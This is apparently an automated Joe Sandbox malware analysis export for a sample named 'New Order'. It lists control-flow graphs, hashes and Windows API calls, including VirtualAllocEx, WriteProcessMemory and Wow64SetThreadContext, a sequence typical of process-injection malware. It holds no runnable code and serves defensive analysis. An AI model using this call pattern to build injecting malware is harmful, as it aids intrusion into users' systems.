                                                                                                                              • Instruction ID: 14e4535100b132837b1a906d5d159d0d27f5ce96ad7e091ff8fc7c5b21c81d23
                                                                                                                              • Opcode Fuzzy Hash: b01fae957ad4f88876444ea87e81240826d2198debfdb4ebfd04eb2e00665b60
                                                                                                                              • Instruction Fuzzy Hash: 87913CB1D0061ADFEF25CF68C8417DEBAB2FB54310F1485AAE809A7390DB749985CF91

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 115 2d9b0d0-2d9b0df 116 2d9b10b-2d9b10f 115->116 117 2d9b0e1-2d9b0ee call 2d99ad4 115->117 119 2d9b111-2d9b11b 116->119 120 2d9b123-2d9b164 116->120 124 2d9b0f0 117->124 125 2d9b104 117->125 119->120 126 2d9b171-2d9b17f 120->126 127 2d9b166-2d9b16e 120->127 170 2d9b0f6 call 2d9b358 124->170 171 2d9b0f6 call 2d9b368 124->171 125->116 128 2d9b181-2d9b186 126->128 129 2d9b1a3-2d9b1a5 126->129 127->126 131 2d9b188-2d9b18f call 2d9aab4 128->131 132 2d9b191 128->132 134 2d9b1a8-2d9b1af 129->134 130 2d9b0fc-2d9b0fe 130->125 133 2d9b240-2d9b300 130->133 138 2d9b193-2d9b1a1 131->138 132->138 165 2d9b308-2d9b333 GetModuleHandleW 133->165 166 2d9b302-2d9b305 133->166 135 2d9b1bc-2d9b1c3 134->135 136 2d9b1b1-2d9b1b9 134->136 139 2d9b1d0-2d9b1d9 call 2d9aac4 135->139 140 2d9b1c5-2d9b1cd 135->140 136->135 138->134 146 2d9b1db-2d9b1e3 139->146 147 2d9b1e6-2d9b1eb 139->147 140->139 146->147 148 2d9b209-2d9b216 147->148 149 2d9b1ed-2d9b1f4 147->149 155 2d9b239-2d9b23f 148->155 156 2d9b218-2d9b236 148->156 149->148 151 2d9b1f6-2d9b206 call 2d9aad4 call 2d9aae4 149->151 151->148 156->155 167 2d9b33c-2d9b350 165->167 168 2d9b335-2d9b33b 165->168 166->165 168->167 170->130 171->130
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 02D9B326
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 173d02bc0d4bc2a2164103e12182f2527b15eaab9c1a51ebfd6ff224b1cffdb1
                                                                                                                              • Instruction ID: 4bbb30629290b1e5c0e2199b9e4838c6af79ca765b457ba44384c442ba5ed10b
                                                                                                                              • Opcode Fuzzy Hash: 173d02bc0d4bc2a2164103e12182f2527b15eaab9c1a51ebfd6ff224b1cffdb1
                                                                                                                              • Instruction Fuzzy Hash: CE710370A00B058FDB24DF69E54575ABBF5FF88204F10892AE48AD7B50DB74E845CB91

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 172 5510aa8-5511d56 174 5511d61-5511d68 172->174 175 5511d58-5511d5e 172->175 176 5511d73-5511e12 CreateWindowExW 174->176 177 5511d6a-5511d70 174->177 175->174 179 5511e14-5511e1a 176->179 180 5511e1b-5511e53 176->180 177->176 179->180 184 5511e60 180->184 185 5511e55-5511e58 180->185 186 5511e61 184->186 185->184 186->186
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05511E02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 79ab8c1234c0e33e77222bf536d4dcfcee2073090b696ec489e75841b24f7410
                                                                                                                              • Instruction ID: e2c8ceec5a1fe36975f53732a1fa098e61eaf6dd10deb5a2ce5192bbbef92d3e
                                                                                                                              • Opcode Fuzzy Hash: 79ab8c1234c0e33e77222bf536d4dcfcee2073090b696ec489e75841b24f7410
                                                                                                                              • Instruction Fuzzy Hash: D451C1B1D00749DFDB14CF9AC884ADEBFB5BF48310F24826AE919AB210D7749845CF94

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 187 5511ce4-5511d56 189 5511d61-5511d68 187->189 190 5511d58-5511d5e 187->190 191 5511d73-5511dab 189->191 192 5511d6a-5511d70 189->192 190->189 193 5511db3-5511e12 CreateWindowExW 191->193 192->191 194 5511e14-5511e1a 193->194 195 5511e1b-5511e53 193->195 194->195 199 5511e60 195->199 200 5511e55-5511e58 195->200 201 5511e61 199->201 200->199 201->201
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05511E02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: f39fa0396ec2b737689f250d7ffc4b4692661d8c77cc82ca9d0118b65edc88f2
                                                                                                                              • Instruction ID: 96fbd1dbe57aa7a00290046a21ecb0d563b12ef7b8f538efd689dcfd04d19651
                                                                                                                              • Opcode Fuzzy Hash: f39fa0396ec2b737689f250d7ffc4b4692661d8c77cc82ca9d0118b65edc88f2
                                                                                                                              • Instruction Fuzzy Hash: BA51B1B1D00749AFDB14CF99C884ADEBFB5BF48310F24826AE919AB210D7709845CF95

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 202 5510bfc-55142fc 205 5514302-5514307 202->205 206 55143ac-55143cc call 5510ad4 202->206 208 5514309-5514340 205->208 209 551435a-5514392 CallWindowProcW 205->209 213 55143cf-55143dc 206->213 215 5514342-5514348 208->215 216 5514349-5514358 208->216 211 5514394-551439a 209->211 212 551439b-55143aa 209->212 211->212 212->213 215->216 216->213
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05514381
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              • Opcode ID: 1df8d561ccd0149a557f76906b0b2cbcefbf9fb1d69d82b30597d6e3e8550ca8
                                                                                                                              • Instruction ID: 92ebf56ceb8407a2f5778fdf108a8e64a9c6b1bb09ff26b8fd921d911f0a1328
                                                                                                                              • Opcode Fuzzy Hash: 1df8d561ccd0149a557f76906b0b2cbcefbf9fb1d69d82b30597d6e3e8550ca8
                                                                                                                              • Instruction Fuzzy Hash: 704119B9900309CFDB14CF99C488AAEFBF5FF88314F248859D519AB361D774A841CBA4

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 219 2d944b4-2d959b9 CreateActCtxA 222 2d959bb-2d959c1 219->222 223 2d959c2-2d95a1c 219->223 222->223 230 2d95a2b-2d95a2f 223->230 231 2d95a1e-2d95a21 223->231 232 2d95a31-2d95a3d 230->232 233 2d95a40-2d95a70 230->233 231->230 232->233 237 2d95a22-2d95a2a 233->237 238 2d95a72-2d95af4 233->238 237->230 241 2d959af-2d959b9 237->241 241->222 241->223
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02D959A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 57cbe40875f85def70d01c714655f1238c548545e5404040c47f3b8392757cdb
                                                                                                                              • Instruction ID: 4ccf0707308ae86308f53b9add38fbb77a65c9c7388afe995b0b240ec77713f2
                                                                                                                              • Opcode Fuzzy Hash: 57cbe40875f85def70d01c714655f1238c548545e5404040c47f3b8392757cdb
                                                                                                                              • Instruction Fuzzy Hash: 6441E1B0C0071DCBDB25CFA9D984B9EBBB5BF48304F60816AD408AB251DB716945CF90

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 242 2d958ed-2d958f3 243 2d958f8-2d959b9 CreateActCtxA 242->243 245 2d959bb-2d959c1 243->245 246 2d959c2-2d95a1c 243->246 245->246 253 2d95a2b-2d95a2f 246->253 254 2d95a1e-2d95a21 246->254 255 2d95a31-2d95a3d 253->255 256 2d95a40-2d95a70 253->256 254->253 255->256 260 2d95a22-2d95a2a 256->260 261 2d95a72-2d95af4 256->261 260->253 264 2d959af-2d959b9 260->264 264->245 264->246
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02D959A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: ceaa87bb521ead02a96682bf34ac0b8cc7fa7bfed48b380a6a5d9eb0c53aa5b8
                                                                                                                              • Instruction ID: 2d603f9fa05d815582123711aa9731909f441bef7798c455a180366964ae30af
                                                                                                                              • Opcode Fuzzy Hash: ceaa87bb521ead02a96682bf34ac0b8cc7fa7bfed48b380a6a5d9eb0c53aa5b8
                                                                                                                              • Instruction Fuzzy Hash: 7441CFB0C0072DCBEF25CFA9C984B8EBBB5BF88304F60816AD409AB251DB756945CF50

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 265 60b27c0-60b27e5 call 60b211c 268 60b27fa-60b288c CreateIconFromResourceEx 265->268 269 60b27e7-60b27f7 call 60b1e78 265->269 274 60b288e-60b2894 268->274 275 60b2895-60b28b2 268->275 274->275
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2181853578.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_60b0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: 9a071938e7d212d48cc107996dc828ad183b90b57cfaf6bf11048646cc5ff2d9
                                                                                                                              • Instruction ID: efcd72c46c4552d6477c9e1c021e26430e29714122d4aa821469a874f005942d
                                                                                                                              • Opcode Fuzzy Hash: 9a071938e7d212d48cc107996dc828ad183b90b57cfaf6bf11048646cc5ff2d9
                                                                                                                              • Instruction Fuzzy Hash: 57318B729043999FCB02DFA9C840AEEBFF8EF09310F14805AE954A7261C3759950DFA1

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 278 74a6860-74a68b6 280 74a68b8-74a68c4 278->280 281 74a68c6-74a6905 WriteProcessMemory 278->281 280->281 283 74a690e-74a693e 281->283 284 74a6907-74a690d 281->284 284->283
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 074A68F8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              • Opcode ID: 453266061b992ac45a0312dc43e782b51067cf369225913bbbe015608e390afc
                                                                                                                              • Instruction ID: c6cace831c5e5ea8628a964832bfb0a875eda2ccef40ce2135a89692231d0610
                                                                                                                              • Opcode Fuzzy Hash: 453266061b992ac45a0312dc43e782b51067cf369225913bbbe015608e390afc
                                                                                                                              • Instruction Fuzzy Hash: E72148B5900349DFDB10CFA9C881BDEBBF5FF48320F14842AE919A7240D7799954CBA5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 298 74a6950-74a69d8 ReadProcessMemory 302 74a69da-74a69e5 298->302 303 74a69ee-74a6a1e 302->303 304 74a69e7-74a69ed 302->304 304->303
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 074A69D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              • Opcode ID: bf83c900f8b8513c0a8a56da3ad10e78c801a18b9654e6a77cd6bc6ff407be2c
                                                                                                                              • Instruction ID: 8ffbd9380f0665df67fb8d09d2f39eeb4a39b9ad1f900a2aa1c1eccd20e3a2fe
                                                                                                                              • Opcode Fuzzy Hash: bf83c900f8b8513c0a8a56da3ad10e78c801a18b9654e6a77cd6bc6ff407be2c
                                                                                                                              • Instruction Fuzzy Hash: 6E2139B1800359DFDB10CF9AC881AEEFBF5FF48320F14842AE518A7240D774A910CBA5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 288 74a6868-74a68b6 290 74a68b8-74a68c4 288->290 291 74a68c6-74a6905 WriteProcessMemory 288->291 290->291 293 74a690e-74a693e 291->293 294 74a6907-74a690d 291->294 294->293
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 074A68F8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              • Opcode ID: 9b2c48b44d9e11154a138f6dcac62bd2bb95fe329b0f5bfed723a0680692462d
                                                                                                                              • Instruction ID: 35b84a69f5765d4a3d60f559451094f0fd4a37ffb1d2c68a1452e5ac56c47ac1
                                                                                                                              • Opcode Fuzzy Hash: 9b2c48b44d9e11154a138f6dcac62bd2bb95fe329b0f5bfed723a0680692462d
                                                                                                                              • Instruction Fuzzy Hash: B62126B5900349DFDB10CFAAC981BDEBBF5FF48320F14842AE919A7240D7789954CBA5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 308 74a6290-74a62e3 311 74a62f3-74a6323 Wow64SetThreadContext 308->311 312 74a62e5-74a62f1 308->312 314 74a632c-74a635c 311->314 315 74a6325-74a632b 311->315 312->311 315->314
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074A6316
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0
                                                                                                                              • Opcode ID: a5c1265fe033648d1e3aa90a5a1310b8fa9cdce7f99a0cb049f7dd423df16dc6
                                                                                                                              • Instruction ID: 0bf108e30874e39fb88abcc350466c28b90822993c9cc085e7a872bcec5ab38c
                                                                                                                              • Opcode Fuzzy Hash: a5c1265fe033648d1e3aa90a5a1310b8fa9cdce7f99a0cb049f7dd423df16dc6
                                                                                                                              • Instruction Fuzzy Hash: 9B212AB6D003099FDB10DFAAC4857EEBBF4EF48220F14842AD519A7240D778A945CF95

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 319 2d9cc40-2d9d634 DuplicateHandle 321 2d9d63d-2d9d65a 319->321 322 2d9d636-2d9d63c 319->322 322->321
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D9D566,?,?,?,?,?), ref: 02D9D627
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: c631c17f74e95617dbc9ee1de7cd4c95d89b5628d0ee9faba7565781943d94e9
                                                                                                                              • Instruction ID: 683337a208c83c7b7de2244afd284af16863ae4cdc875561f45a0e153b19d625
                                                                                                                              • Opcode Fuzzy Hash: c631c17f74e95617dbc9ee1de7cd4c95d89b5628d0ee9faba7565781943d94e9
                                                                                                                              • Instruction Fuzzy Hash: C521E3B5900249EFDB10DF9AD984ADEBBF9EB48320F14841AE918A3350D374A950CFA5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 325 74a6298-74a62e3 327 74a62f3-74a6323 Wow64SetThreadContext 325->327 328 74a62e5-74a62f1 325->328 330 74a632c-74a635c 327->330 331 74a6325-74a632b 327->331 328->327 331->330
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074A6316
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0
                                                                                                                              • Opcode ID: 193d971a84931c28d1650a0f422b3bdff00c1361d6d8e4706d6fe0f01cb632ee
                                                                                                                              • Instruction ID: fd13d2f1a58474258712ecb219aadcce3c3179c4f172dc005f780994daaee207
                                                                                                                              • Opcode Fuzzy Hash: 193d971a84931c28d1650a0f422b3bdff00c1361d6d8e4706d6fe0f01cb632ee
                                                                                                                              • Instruction Fuzzy Hash: 922118B1D003099FDB10DFAAC4857EEBBF4EF88324F14842AD519A7240DB789945CFA5
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 074A69D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              • Opcode ID: 653e45667af5d70533342d35cfd3e6a692138b0b4db8c3443337e5261c4f45a0
                                                                                                                              • Instruction ID: 53df1b1cd1a1d7bbf399975f33747411cd35b801c4adc4992f0e1ea20f51de8f
                                                                                                                              • Opcode Fuzzy Hash: 653e45667af5d70533342d35cfd3e6a692138b0b4db8c3443337e5261c4f45a0
                                                                                                                              • Instruction Fuzzy Hash: 262128B1800359DFDB10CFAAC881BDEBBF5FF48320F14842AE519A7240D7789910CBA5
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D9D566,?,?,?,?,?), ref: 02D9D627
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: a3ae5c363db56d2ad5107528949ae6b5a10099657220408cd83623c51e52cfa2
                                                                                                                              • Instruction ID: cf5a921c609eb9a5ddf8ecff451609a1ffd69ce6d2dfa003848e5f2ff63bdcc5
                                                                                                                              • Opcode Fuzzy Hash: a3ae5c363db56d2ad5107528949ae6b5a10099657220408cd83623c51e52cfa2
                                                                                                                              • Instruction Fuzzy Hash: FF21B0B5D00249DFDB10CFAAD984ADEBBF5FB48324F24841AE918A3350D378A954CF65
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,060B27DA,?,?,?,?,?), ref: 060B287F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2181853578.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_60b0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: e828af916f3e264fde0c8cfd07cbf3356132ebcd948052105dc3cae3c774938b
                                                                                                                              • Instruction ID: 36f7cb8ba6e9849a9e02085e809b12acde2934244315e2db66fd3dbe5ed8a0c8
                                                                                                                              • Opcode Fuzzy Hash: e828af916f3e264fde0c8cfd07cbf3356132ebcd948052105dc3cae3c774938b
                                                                                                                              • Instruction Fuzzy Hash: 9B1137B5800349DFDB10CF9AC844BEEBFF8EB48320F14841AE914A7250D379A954CFA5
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 074A6816
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: e0573a9aea0102f66141aac2c473fe133f22cff1bfb5c052999e28f10b8a910d
                                                                                                                              • Instruction ID: 4ff683b307984c801c88ef0d1e5df53bad8f0b18302a9ecd5724b0676d29e916
                                                                                                                              • Opcode Fuzzy Hash: e0573a9aea0102f66141aac2c473fe133f22cff1bfb5c052999e28f10b8a910d
                                                                                                                              • Instruction Fuzzy Hash: 6A1167B290024ADFDB10CFA9C844BDEBBF5EF88320F14841AE519AB250C7759550CB91
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 074A6816
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: f13d104020502de38c3bdad37993051179db53fce5d656f294bddc95def9d47f
                                                                                                                              • Instruction ID: 19fb6a8e16621afe4cb4d23f0bac880918216f3321d19c5b92f8f30b28c1f5eb
                                                                                                                              • Opcode Fuzzy Hash: f13d104020502de38c3bdad37993051179db53fce5d656f294bddc95def9d47f
                                                                                                                              • Instruction Fuzzy Hash: 2D1156B2800249DFDB10DFAAC845BDFBBF5EF88320F24841AE519A7250C775A510CFA1
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: a19e544d2b79c1c5f6a811de3dd4431d8a5663496f970ca1a65db6074d6e1c40
                                                                                                                              • Instruction ID: 490357c25201c8cf80656f639d5ee3ebac84d40e66a01f862088991e062f7f67
                                                                                                                              • Opcode Fuzzy Hash: a19e544d2b79c1c5f6a811de3dd4431d8a5663496f970ca1a65db6074d6e1c40
                                                                                                                              • Instruction Fuzzy Hash: A71158B59003499FDB10DFAAC8457DFFBF4EF88320F24841AD519A7240DB79A541CBA5
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: 934c57bb80ba7f7845cf6982740da5d9e7def14730a1c8fc40c7ee06addbe035
                                                                                                                              • Instruction ID: a1e43f1a7484f6eea75291dffb54858a0e6a000ffb2517e72caf2f3f4f49b673
                                                                                                                              • Opcode Fuzzy Hash: 934c57bb80ba7f7845cf6982740da5d9e7def14730a1c8fc40c7ee06addbe035
                                                                                                                              • Instruction Fuzzy Hash: D41125B59003499FDB20DFAAC4457DEFBF4AF88724F24841AD519A7240CB79A940CBA5
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074A97D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 023fe84e1935f50d1e8c683f64009bef375dc7a7a158d8ed10531b026ff136ca
                                                                                                                              • Instruction ID: 77cb4c7a30dbfe7f21948a12d15a42cc0934bf4a1dfda0f3694ccf5d339cd79a
                                                                                                                              • Opcode Fuzzy Hash: 023fe84e1935f50d1e8c683f64009bef375dc7a7a158d8ed10531b026ff136ca
                                                                                                                              • Instruction Fuzzy Hash: 5C11E3B9800249EFDB10CF9AC984BDEFBF8EB48324F24845AE519A7600D375A544CFA5
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074A97D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 6aea7ff9d2ac2874882ddbba9e9fc56a5b0087053763acb1b513c5bfa1571373
